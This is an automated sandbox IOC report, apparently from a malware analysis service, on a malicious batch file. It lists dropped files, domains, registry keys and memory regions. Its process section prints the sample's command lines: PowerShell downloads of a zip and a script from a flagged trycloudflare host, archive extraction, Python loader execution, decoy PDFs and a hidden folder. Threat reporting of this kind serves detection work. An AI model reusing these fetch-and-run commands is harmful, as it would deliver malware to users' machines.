IOC Report
ZtefPP1HI7.cmd

loading gif

Files

File Path
Type
Category
Malicious
ZtefPP1HI7.cmd
DOS batch file, ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x217a6b7b, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndwij5o4.gvl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnxf5gxa.tuk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1xhi5dg.kpv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3jcahg5.kk3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4remje3.sw3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xltgndgt.z2e.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yufkvzzs.cpo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjo22bxe.ccp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZtefPP1HI7.cmd" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip' -OutFile 'C:\Users\user\Downloads\jnk8ai.zip' }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\jnk8ai.zip' -DesusertionPath 'C:\Users\user\Downloads' -Force }"
malicious
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
python.exe hey.py
malicious
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
python.exe loader.py
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmd' -OutFile 'C:\Users\user\Downloads\update.cmd' }"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://spectrum-exactly-knitting-rural.trycloudflare.com/policy.pdf
C:\Windows\System32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2392,i,6131583627039465295,1302718975251909702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://spectrum-exactly-knitting-rural.trycloudflare.com/a.pdf
C:\Windows\System32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,15215304549136021077,16069531539284027564,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\attrib.exe
attrib +h "C:\Users\user\Downloads\Python"
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmd
unknown
malicious
https://spectrum-exactly-knitting-rural.trycloudflare.com
unknown
malicious
https://spectrum-exactly-knitting-rural.trycloudflare
unknown
malicious
https://spectrum-exactly-knitting-rural.trycloudflare.
unknown
malicious
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip
unknown
malicious
https://spectrum-exactly-knitting-rural.trycloudflare.com/policy.pdf
unknown
http://nuget.org/NuGet.exe
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip/N
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmd?Nr
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/a.pdf
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip%NL
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zips
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdCommonProgramFiles=C
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdX
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdCommonProgramFiles=C:
unknown
https://github.com/Pester/Pester
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/22spectrum-exactly-knitting-rural.trycloud
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipA~
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipO
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdH
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipLMEM
unknown
https://g.live.com/odclientsettings/Prod-C:
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipX
unknown
https://contoso.com/
unknown
https://g.live.com/odclientsettings/ProdV2-C:
unknown
https://nuget.org/nuget.exe
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipV
unknown
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdx
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
spectrum-exactly-knitting-rural.trycloudflare.com
unknown
malicious
s-part-0014.t-0009.t-msedge.net
13.107.246.42
google.com
142.250.184.206
www.google.com
142.250.184.228

IPs

IP
Domain
Country
Malicious
239.255.255.250
unknown
Reserved
192.168.2.9
unknown
unknown
142.250.184.228
www.google.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FF8793D1000
trusted library allocation
page read and write
1D0F3FF5000
trusted library allocation
page read and write
EB235CE000
stack
page read and write
1EB25410000
trusted library section
page readonly
1D291FF000
stack
page read and write
7FF8794B0000
trusted library allocation
page read and write
1EB24400000
heap
page read and write
1EB29A40000
trusted library allocation
page read and write
2AECAE30000
heap
page read and write
1EB2990A000
heap
page read and write
3605F7E000
stack
page read and write
1D292FE000
stack
page read and write
2AECC523000
trusted library allocation
page read and write
236BDE62000
heap
page read and write
1EB2990E000
heap
page read and write
7FF8793EA000
trusted library allocation
page read and write
EB23EFE000
stack
page read and write
EB2494E000
stack
page read and write
1D28DFD000
stack
page read and write
209161D0000
heap
page read and write
412E7C000
stack
page read and write
5F7F1A7000
stack
page read and write
2AEE4AF7000
heap
page read and write
1EB29A73000
trusted library allocation
page read and write
2AECCA0A000
trusted library allocation
page read and write
2AECAE50000
heap
page read and write
1D0E20F2000
heap
page read and write
1D28EFE000
stack
page read and write
7FF87923B000
trusted library allocation
page read and write
17FF31D0000
heap
page read and write
7FF879240000
trusted library allocation
page read and write
2AEDC981000
trusted library allocation
page read and write
1EB2442B000
heap
page read and write
360557E000
stack
page read and write
1D0FC0EC000
heap
page read and write
A4D17FD000
stack
page read and write
236BDE2B000
heap
page read and write
2AEE4D40000
heap
page read and write
1D0E22B6000
heap
page read and write
1EB29A70000
trusted library allocation
page read and write
7FF8793F0000
trusted library allocation
page execute and read and write
1EB297B0000
trusted library allocation
page read and write
1EB29A84000
trusted library allocation
page read and write
1D28C7E000
stack
page read and write
1D0E2263000
trusted library allocation
page read and write
1D0E4BB1000
trusted library allocation
page read and write
36048FD000
stack
page read and write
1EB243A0000
trusted library section
page read and write
1EB29A40000
trusted library allocation
page read and write
36055FE000
unkown
page readonly
7FF879570000
trusted library allocation
page read and write
7FF879400000
trusted library allocation
page execute and read and write
17FF31D9000
heap
page read and write
1D0FC260000
heap
page execute and read and write
7FF8793E0000
trusted library allocation
page execute and read and write
1EB25400000
trusted library section
page readonly
7FF8792D6000
trusted library allocation
page read and write
360517E000
stack
page read and write
1EB2984F000
heap
page read and write
1D0FC180000
heap
page read and write
2AECAE54000
heap
page read and write
1F6D2DF0000
heap
page read and write
36051FE000
unkown
page readonly
236BDE58000
heap
page read and write
1EB29B90000
trusted library allocation
page read and write
2AECAC70000
heap
page read and write
36049FE000
unkown
page readonly
1F6D2C50000
heap
page read and write
236BDE02000
heap
page read and write
20918002000
heap
page read and write
17FF4CF0000
heap
page read and write
1EB2A000000
heap
page read and write
1EB29861000
heap
page read and write
EB23CF8000
stack
page read and write
1EB244BB000
heap
page read and write
2AECC620000
heap
page read and write
1D28D7E000
stack
page read and write
36047FE000
unkown
page readonly
1EB2448D000
heap
page read and write
1EB24490000
heap
page read and write
7FF8792E6000
trusted library allocation
page read and write
2AEE4A90000
heap
page read and write
3604AFB000
stack
page read and write
1EB24E91000
trusted library allocation
page read and write
7FF8794A0000
trusted library allocation
page read and write
236BDE13000
heap
page read and write
2AEE4D98000
heap
page read and write
17FF4CF5000
heap
page read and write
1EB2988D000
heap
page read and write
7FF8793E1000
trusted library allocation
page read and write
20916060000
heap
page read and write
1EB29821000
heap
page read and write
7FF879460000
trusted library allocation
page read and write
1D0E1F70000
heap
page read and write
EB2358E000
stack
page read and write
7FF879480000
trusted library allocation
page read and write
2AECC4B0000
trusted library allocation
page read and write
1D0E20D5000
heap
page read and write
7FF8794B0000
trusted library allocation
page read and write
1D0FC410000
heap
page read and write
1D0FC45A000
heap
page read and write
EB23BF9000
stack
page read and write
7FF879470000
trusted library allocation
page read and write
EB2397C000
stack
page read and write
1D28F7D000
stack
page read and write
7FF879530000
trusted library allocation
page read and write
1EB29C00000
remote allocation
page read and write
7FF879560000
trusted library allocation
page read and write
7FF879520000
trusted library allocation
page read and write
2AECDAFD000
trusted library allocation
page read and write
1D0E3EC0000
trusted library allocation
page read and write
1EB244FF000
heap
page read and write
A4D12F7000
stack
page read and write
1EB29BA0000
trusted library allocation
page read and write
1D0E2050000
heap
page read and write
7FF8792D0000
trusted library allocation
page read and write
7FF879234000
trusted library allocation
page read and write
7FF879530000
trusted library allocation
page read and write
1D0F4137000
trusted library allocation
page read and write
7FF879230000
trusted library allocation
page read and write
236BDE3D000
heap
page read and write
36040F7000
stack
page read and write
3605FFE000
unkown
page readonly
1D0E22B0000
heap
page read and write
7FF8794C0000
trusted library allocation
page read and write
20916202000
heap
page read and write
1D0E20F6000
heap
page read and write
EB23D7E000
stack
page read and write
1D0E3F70000
heap
page execute and read and write
2AECE2EA000
trusted library allocation
page read and write
2AECC4C0000
heap
page readonly
7FF879420000
trusted library allocation
page execute and read and write
3604CFE000
unkown
page readonly
1D0FC43A000
heap
page read and write
1EB2447C000
heap
page read and write
1EB298C8000
heap
page read and write
7FF8794D0000
trusted library allocation
page read and write
7FF879440000
trusted library allocation
page read and write
2AECC4D0000
trusted library allocation
page read and write
7FF8793DA000
trusted library allocation
page read and write
1EB24474000
heap
page read and write
2AECDF74000
trusted library allocation
page read and write
1F6D13B0000
heap
page read and write
1EB24513000
heap
page read and write
1D28CFE000
stack
page read and write
1D0FC476000
heap
page read and write
1D0FC0C0000
heap
page read and write
7FF8793C2000
trusted library allocation
page read and write
412F7F000
stack
page read and write
1EB24440000
heap
page read and write
1D0FC09B000
heap
page read and write
7FF879520000
trusted library allocation
page read and write
1D0E21B0000
heap
page read and write
EB2387F000
stack
page read and write
36056FE000
stack
page read and write
2AEE4C37000
heap
page execute and read and write
EB239FE000
stack
page read and write
2AECAADE000
heap
page read and write
2AECAA70000
heap
page read and write
360527E000
stack
page read and write
1F6D1280000
heap
page read and write
1D289FE000
stack
page read and write
360507E000
stack
page read and write
1D0E2220000
heap
page readonly
17FF31B0000
heap
page read and write
7FF8793D0000
trusted library allocation
page read and write
1D0E2134000
heap
page read and write
2AECC981000
trusted library allocation
page read and write
1D29078000
stack
page read and write
236BDF02000
heap
page read and write
2AEE4D9F000
heap
page read and write
7FF879590000
trusted library allocation
page read and write
1EB29C00000
remote allocation
page read and write
36054FE000
unkown
page readonly
1D0E3FFD000
trusted library allocation
page read and write
5F7F5FE000
stack
page read and write
1D289B2000
stack
page read and write
412EFF000
stack
page read and write
2AEE4B45000
heap
page read and write
1EB29854000
heap
page read and write
7FF879450000
trusted library allocation
page read and write
3604D7E000
stack
page read and write
7FF879430000
trusted library allocation
page read and write
7FF879490000
trusted library allocation
page read and write
36041FE000
unkown
page readonly
2AEE4D95000
heap
page read and write
36044F9000
stack
page read and write
7FF879550000
trusted library allocation
page read and write
1D0E22C0000
heap
page read and write
2AECC630000
heap
page read and write
36052FE000
unkown
page readonly
1D28E7E000
stack
page read and write
1EB24D1A000
heap
page read and write
7FF879560000
trusted library allocation
page read and write
2AEE4C30000
heap
page execute and read and write
1EB2982E000
heap
page read and write
236BFE02000
heap
page read and write
236BDDB0000
heap
page read and write
1EB298F6000
heap
page read and write
7FF879460000
trusted library allocation
page read and write
7FF8792EC000
trusted library allocation
page execute and read and write
1EB24C15000
heap
page read and write
20916213000
heap
page read and write
1EB24502000
heap
page read and write
2AECE4FA000
trusted library allocation
page read and write
1D0E5AF9000
trusted library allocation
page read and write
7FF879550000
trusted library allocation
page read and write
7FF87927C000
trusted library allocation
page execute and read and write
236BDE00000
heap
page read and write
1D2937B000
stack
page read and write
2AECAB25000
heap
page read and write
1D0E5BBE000
trusted library allocation
page read and write
36045FE000
unkown
page readonly
1EB29A41000
trusted library allocation
page read and write
7FF8795A0000
trusted library allocation
page read and write
1EB24492000
heap
page read and write
1EB29A44000
trusted library allocation
page read and write
2AECDF78000
trusted library allocation
page read and write
1EB29B10000
trusted library allocation
page read and write
7FF8792DC000
trusted library allocation
page execute and read and write
1D0F3F91000
trusted library allocation
page read and write
2AEE4B33000
heap
page read and write
1EB29911000
heap
page read and write
1EB2988F000
heap
page read and write
2091624A000
heap
page read and write
2AEE4C40000
heap
page read and write
2AECC520000
trusted library allocation
page read and write
1EB24390000
trusted library allocation
page read and write
2AEE4C60000
heap
page read and write
2AECAA60000
heap
page read and write
1EB25450000
trusted library section
page readonly
EB23B76000
stack
page read and write
1D0FC050000
heap
page execute and read and write
7FF879540000
trusted library allocation
page read and write
7DF4C12C0000
trusted library allocation
page execute and read and write
7FF879250000
trusted library allocation
page read and write
1EB24479000
heap
page read and write
1EB24C02000
heap
page read and write
7FF8794E0000
trusted library allocation
page read and write
1EB24C00000
heap
page read and write
1EB29A20000
trusted library allocation
page read and write
7FF879350000
trusted library allocation
page execute and read and write
1EB298C1000
heap
page read and write
1D0F3F81000
trusted library allocation
page read and write
7FF879540000
trusted library allocation
page read and write
1D0FC183000
heap
page read and write
EB24A4D000
stack
page read and write
2AECAAE8000
heap
page read and write
EB23503000
stack
page read and write
1EB25320000
trusted library allocation
page read and write
7FF879233000
trusted library allocation
page execute and read and write
5F7F6FD000
stack
page read and write
2AEDC9F6000
trusted library allocation
page read and write
2AEE4ADD000
heap
page read and write
1D0E20FA000
heap
page read and write
2AEE4D5F000
heap
page read and write
EB23AFD000
stack
page read and write
1EB29A80000
trusted library allocation
page read and write
7FF879306000
trusted library allocation
page execute and read and write
A4D15FD000
stack
page read and write
3F4607E000
stack
page read and write
2AEE4B4D000
heap
page read and write
2AEE4DB7000
heap
page read and write
7FF879510000
trusted library allocation
page read and write
1EB29B90000
trusted library allocation
page read and write
1EB298F0000
heap
page read and write
36057FE000
unkown
page readonly
1EB24260000
heap
page read and write
1D0E20EC000
heap
page read and write
1EB29903000
heap
page read and write
EB23C77000
stack
page read and write
1EB257B0000
trusted library allocation
page read and write
2AEE4B7F000
heap
page read and write
1EB29A30000
trusted library allocation
page read and write
236BDE6B000
heap
page read and write
2AECE5C4000
trusted library allocation
page read and write
2AECAAFE000
heap
page read and write
1D29D4E000
stack
page read and write
5F7F8FE000
stack
page read and write
3604C7E000
stack
page read and write
1EB29A60000
trusted library allocation
page read and write
1D0E41B1000
trusted library allocation
page read and write
5F7F4FE000
stack
page read and write
1EB29B10000
trusted library allocation
page read and write
3F45D3C000
stack
page read and write
7FF879570000
trusted library allocation
page read and write
1D0E56A4000
trusted library allocation
page read and write
1EB24D1A000
heap
page read and write
7FF8792E0000
trusted library allocation
page read and write
1EB29842000
heap
page read and write
1D0FC448000
heap
page read and write
1D28FF9000
stack
page read and write
2AECAAEC000
heap
page read and write
1EB29C00000
remote allocation
page read and write
EB23A7E000
stack
page read and write
20916302000
heap
page read and write
1EB298E3000
heap
page read and write
7FF879580000
trusted library allocation
page read and write
1D0E22A0000
heap
page read and write
20916140000
heap
page read and write
1D0F426F000
trusted library allocation
page read and write
1EB25440000
trusted library section
page readonly
2091622B000
heap
page read and write
7FF87928C000
trusted library allocation
page execute and read and write
1EB29B20000
trusted library allocation
page read and write
2AEE50A0000
heap
page read and write
7FF8794E0000
trusted library allocation
page read and write
7FF879500000
trusted library allocation
page read and write
1D0E3DB7000
heap
page read and write
1D0E20B0000
heap
page read and write
1EB25140000
trusted library allocation
page read and write
2AEDCB39000
trusted library allocation
page read and write
2AECD5B2000
trusted library allocation
page read and write
7FF8794F0000
trusted library allocation
page read and write
3604DFE000
unkown
page readonly
7FF879440000
trusted library allocation
page read and write
1D0E22C4000
heap
page read and write
A4D16FF000
stack
page read and write
A4D14FE000
stack
page read and write
EB23F7B000
stack
page read and write
1EB24D1B000
heap
page read and write
7FF8794A0000
trusted library allocation
page read and write
7FF879450000
trusted library allocation
page read and write
7FF879490000
trusted library allocation
page read and write
5F7F9FC000
stack
page read and write
7FF879480000
trusted library allocation
page read and write
7FF8793C0000
trusted library allocation
page read and write
7FF879222000
trusted library allocation
page read and write
7FF879412000
trusted library allocation
page read and write
1F6D13B8000
heap
page read and write
1D0E5BC2000
trusted library allocation
page read and write
7FF8794D0000
trusted library allocation
page read and write
1D29DCE000
stack
page read and write
7FF8792F0000
trusted library allocation
page execute and read and write
EB249CE000
stack
page read and write
1EB29A70000
trusted library allocation
page read and write
1EB24428000
heap
page read and write
1F6D1360000
heap
page read and write
1EB24D0C000
heap
page read and write
2AECE113000
trusted library allocation
page read and write
7FF87922D000
trusted library allocation
page execute and read and write
EB23DFE000
stack
page read and write
1EB24360000
heap
page read and write
3603B2C000
stack
page read and write
A4D13FE000
stack
page read and write
1D2917C000
stack
page read and write
1D0FC0DD000
heap
page read and write
1D0E58E8000
trusted library allocation
page read and write
2AEE4A96000
heap
page read and write
36053FB000
stack
page read and write
1EB24D02000
heap
page read and write
1EB29B70000
trusted library allocation
page read and write
7FF8792E0000
trusted library allocation
page execute and read and write
20916262000
heap
page read and write
236BDE4A000
heap
page read and write
7FF879402000
trusted library allocation
page read and write
7FF879470000
trusted library allocation
page read and write
2AEE4985000
heap
page read and write
7FF8794F0000
trusted library allocation
page read and write
1D0E2210000
trusted library allocation
page read and write
1EB25420000
trusted library section
page readonly
1D0E3F81000
trusted library allocation
page read and write
2091626B000
heap
page read and write
1D0E210C000
heap
page read and write
2AEDC990000
trusted library allocation
page read and write
7FF879590000
trusted library allocation
page read and write
1D0E5709000
trusted library allocation
page read and write
2AECC4E0000
heap
page execute and read and write
236BFD10000
heap
page read and write
1EB244A2000
heap
page read and write
1EB24D00000
heap
page read and write
1D0E2260000
trusted library allocation
page read and write
236BDDD0000
heap
page read and write
36058FB000
stack
page read and write
7FF879316000
trusted library allocation
page execute and read and write
1EB297C0000
trusted library allocation
page read and write
EB23E7F000
stack
page read and write
1D0FC056000
heap
page execute and read and write
1D0FC09D000
heap
page read and write
7FF879410000
trusted library allocation
page execute and read and write
1EB24D13000
heap
page read and write
20916258000
heap
page read and write
2AECCBB2000
trusted library allocation
page read and write
36043FE000
unkown
page readonly
1EB244B4000
heap
page read and write
1EB2445B000
heap
page read and write
5F7F7FF000
stack
page read and write
1EB24497000
heap
page read and write
3604E7E000
stack
page read and write
1D0E21F0000
trusted library allocation
page read and write
7FF879232000
trusted library allocation
page read and write
236BDDE0000
heap
page read and write
7FF879224000
trusted library allocation
page read and write
7FF8793F0000
trusted library allocation
page execute and read and write
1D0E52E2000
trusted library allocation
page read and write
2AECAAA0000
heap
page read and write
2AEE4C00000
heap
page execute and read and write
1EB29A42000
trusted library allocation
page read and write
7FF87923D000
trusted library allocation
page execute and read and write
2AECE2E8000
trusted library allocation
page read and write
1D0FC060000
heap
page read and write
20916040000
heap
page read and write
1D0FC458000
heap
page read and write
1D0E22B4000
heap
page read and write
2AEE4B85000
heap
page read and write
1D0E5966000
trusted library allocation
page read and write
EB238FE000
stack
page read and write
1D0FC469000
heap
page read and write
1EB29800000
heap
page read and write
7FF879340000
trusted library allocation
page execute and read and write
1EB24413000
heap
page read and write
1EB24BE1000
trusted library allocation
page read and write
1D290F8000
stack
page read and write
3604EFE000
unkown
page readonly
1EB298F4000
heap
page read and write
2AEE4D85000
heap
page read and write
1D0E5576000
trusted library allocation
page read and write
1EB29905000
heap
page read and write
A4D18FC000
stack
page read and write
1D0FC420000
heap
page read and write
7FF879580000
trusted library allocation
page read and write
36050FE000
unkown
page readonly
2AECC634000
heap
page read and write
7FF87924B000
trusted library allocation
page read and write
2AECE5C0000
trusted library allocation
page read and write
20916200000
heap
page read and write
1EB24280000
heap
page read and write
2AECE10A000
trusted library allocation
page read and write
36059FE000
unkown
page readonly
7FF879420000
trusted library allocation
page read and write
36046FB000
stack
page read and write
3F45DBE000
stack
page read and write
3604BFE000
unkown
page readonly
1F6D2DF4000
heap
page read and write
1EB29B80000
trusted library allocation
page read and write
7FF8794C0000
trusted library allocation
page read and write
17FF4B60000
heap
page read and write
2AECAAE2000
heap
page read and write
1D0E2070000
heap
page read and write
2AECE0A3000
trusted library allocation
page read and write
7FF879430000
trusted library allocation
page read and write
2AECC490000
trusted library allocation
page read and write
1D2927E000
stack
page read and write
1D29E4D000
stack
page read and write
7FF879223000
trusted library allocation
page execute and read and write
1D0E2138000
heap
page read and write
7FF879240000
trusted library allocation
page read and write
1EB25430000
trusted library section
page readonly
7FF879510000
trusted library allocation
page read and write
36042FE000
stack
page read and write
7FF879500000
trusted library allocation
page read and write
1EB2990A000
heap
page read and write
17FF31A0000
heap
page read and write
There are 443 hidden memdumps, click here to show them.